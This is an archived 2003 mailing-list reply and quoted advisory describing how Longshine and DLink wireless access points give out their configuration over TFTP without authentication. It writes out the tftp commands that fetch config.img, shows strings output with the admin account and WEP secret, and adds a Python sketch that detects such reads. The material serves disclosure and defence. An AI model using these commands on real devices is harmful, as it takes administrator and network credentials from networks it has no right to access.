Re: Longshine WLAN Access-Point LCS-883R VU#310201

From: heydownsat_private
Date: Mon Jan 06 2003 - 10:57:52 PST


    This vulnerability is also an issue on the popular DLink DI-614+ (which I
    think is based upon the Longshine product).  I was able to grab config.img
    and also extract the "admin" password from it. This was confirmed with
    firmware version 2.03 dated 9/10/2002.
    
    On the DLink product, you can only perform this from the "LAN-side" of the 
    device in the default configuration.
    
    DLink has version 2.10 available, dated 11/25/2002, but I have not tried 
    it yet.
    
    	-Jeff
    
    On Mon, 6 Jan 2003, Lukas Grunwald wrote:
    
    > 
    > 
    > Hardware: Longshine LCS-883R-AC-B External WLAN Access Point 22 Mbps 
    > 
    > Software: ThreadX ARM7/Green Hills Version G3.0f.3.0c from Express Logic Inc.
    > 
    > Description: Get Superuser Privileges and view the device's password and other passwords 
    > 
    > Versions affected: tested with  03.01.0b and 03.01.0h
    > 
    > Vendor contacted: e-mailed Longshine on Sun Dec 29 
    > 
    > Details: You are able to connect via tftp to the access point and you can download the configuration
    > without authentication. In this configuration the username of the superuser and the corresponding
    > password are stored.
    > The WEP secret for the encryption and the password from your RADIUS server are also readable.
    > This "attack" works via WLAN (!!!) and Ethernet.
    > 
    > tftp
    > tftp> connect 192.168.108.48
    > tftp> get config.img
    > Received 780 bytes in 1.0 seconds
    > tftp> quit
    > 
    > [~]/-\>strings config.img 
    > DNXLABAP01 <- name of the AP
    > root	   <- name of the superuser
    > XXXXXX123  <- password from superuser
    > DNXLABLAN  <- ssid
    > secu9	   <- secret for WEP
    > 7890abcdef <-
    > 
    > You are also able to get the following files:
    > 
    > config.img 
    > wbtune.dat
    > mac.dat
    > rom.img
    > normal.img
    > 
    > 
    > Solution: after contact with the vendor he claims that a new firmware-upgrade 
    > fixes this problem, but the latest available firmware on his web-page 
    > doesn't fix it anyway.
    > 
    > Vendor-Contact:
    > 
    > LONGSHINE  Technologie (Europe) GmbH
    > 
    > An der Strusbek 9
    > D-22926 Ahrensburg
    > 
    > Tel: ++ 49 ( 0 ) 4102 / 4922- 0
    > Fax: ++ 49 ( 0 ) 4102 / 40109
    > 
    > supportat_private
    > 
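
Added example, not part of the original messages: a detection sketch that parses TFTP request payloads (UDP port 69, RFC 1350 framing) and flags read requests to an access point for the file names listed in the advisory. The sample packets, the source addresses other than 192.168.108.48, and the idea of exempting a management host are constructed assumptions.

```python
import struct

# File names the advisory reports as retrievable from the access point.
SENSITIVE = {"config.img", "wbtune.dat", "mac.dat", "rom.img", "normal.img"}
RRQ, WRQ = 1, 2  # TFTP read-request / write-request opcodes (RFC 1350)

def parse_request(payload: bytes):
    """Return (opcode, filename, mode) for a TFTP RRQ/WRQ, else None."""
    if len(payload) < 4:
        return None
    (opcode,) = struct.unpack("!H", payload[:2])
    if opcode not in (RRQ, WRQ):
        return None
    fields = payload[2:].split(b"\x00")
    # Well-formed: filename NUL mode NUL, so at least three pieces (the last
    # is whatever follows the final NUL: empty, or RFC 2347 options).
    if len(fields) < 3 or not fields[0] or not fields[1]:
        return None
    filename = fields[0].decode("ascii", "replace")
    return opcode, filename, fields[1].decode("ascii", "replace").lower()

def flag_reads(packets, access_points, mgmt_hosts=frozenset()):
    """Return (src, dst, filename) for reads of sensitive files from an AP."""
    alerts = []
    for src, dst, payload in packets:
        req = parse_request(payload)
        if req is None or dst not in access_points or src in mgmt_hosts:
            continue
        opcode, filename, _mode = req
        # Compare on the lower-cased base name so path or case variants match.
        name = filename.replace("\\", "/").rsplit("/", 1)[-1].lower()
        if opcode == RRQ and name in SENSITIVE:
            alerts.append((src, dst, name))
    return alerts

# Constructed sample traffic: (source IP, destination IP, UDP/69 payload).
SAMPLE = [
    ("192.168.108.77", "192.168.108.48", b"\x00\x01config.img\x00octet\x00"),
    ("192.168.108.77", "192.168.108.48", b"\x00\x01ROM.IMG\x00netascii\x00"),
    ("192.168.108.10", "192.168.108.48", b"\x00\x01config.img\x00octet\x00"),  # mgmt host
    ("192.168.108.77", "192.168.108.48", b"\x00\x02config.img\x00octet\x00"),  # write, not read
    ("192.168.108.77", "192.168.108.48", b"\x00\x01config.img"),               # truncated
    ("192.168.108.77", "192.168.108.99", b"\x00\x01config.img\x00octet\x00"),  # not an AP
]

if __name__ == "__main__":
    for alert in flag_reads(SAMPLE, {"192.168.108.48"}, {"192.168.108.10"}):
        print("tftp-sensitive-read", *alert)
```

Because TFTP carries no authentication, the management-host exemption only reduces alert noise; it does not make those reads any safer.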
    



    This archive was generated by hypermail 2b30 : Mon Jan 06 2003 - 20:10:10 PST